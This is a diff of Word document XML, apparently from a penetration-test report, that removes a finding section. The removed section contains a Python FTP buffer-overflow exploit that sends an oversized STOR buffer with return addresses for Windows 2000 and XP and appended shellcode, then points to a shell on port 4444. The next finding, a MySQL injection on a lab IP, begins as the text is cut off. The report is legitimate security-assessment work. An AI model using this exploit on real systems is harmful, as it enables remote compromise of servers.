-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>buffer = '\x41'*966+struct.pack('&lt;L', 0x7C2FA0F</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>7)+</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>'\x42'*32+sc # RET Windows 2000 Server SP4</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>#buffer = '\x41'*970+struct.pack('&lt;L', 0x7D17D</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>737)+</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>'\x42'*32+sc # RET Windows XP SP2</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>try:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t># Edit the IP, Username and Password.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">ftp = </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>FTP(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">'127.0.0.1') </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>ftp.login</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>('</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftp','ftp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>')</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nEvil</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Buffer sent..."</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nTry</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> connecting with </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>netcat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> to port 4444 on the remote machine."</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>except:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nCould</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> not Connect to FTP Server."</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>try:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftp.transfercmd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">("STOR " + buffer) </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>except:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nDone</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>."</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Screenshot Here:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                <w:noProof/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="767EEB45" wp14:editId="7E149FA3">
-                  <wp:extent cx="4638675" cy="2419350"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-                  <wp:docPr id="1073741827" name="officeArt object" descr="image.png"/>
-                  <wp:cNvGraphicFramePr/>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1073741827" name="image.png" descr="image.png"/>
-                          <pic:cNvPicPr>
-                            <a:picLocks noChangeAspect="1"/>
-                          </pic:cNvPicPr>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId11"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="4638679" cy="2419352"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                          <a:ln w="12700" cap="flat">
-                            <a:noFill/>
-                            <a:miter lim="400000"/>
-                          </a:ln>
-                          <a:effectLst/>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -11359,323 +9634,6 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-                <w:color w:val="17375E"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:u w:color="17375E"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">Vulnerability Exploited: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:u w:color="4F81BD"/>
-              </w:rPr>
-              <w:t>MySQL Injection</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">System Vulnerable: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>172.16.203.135</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
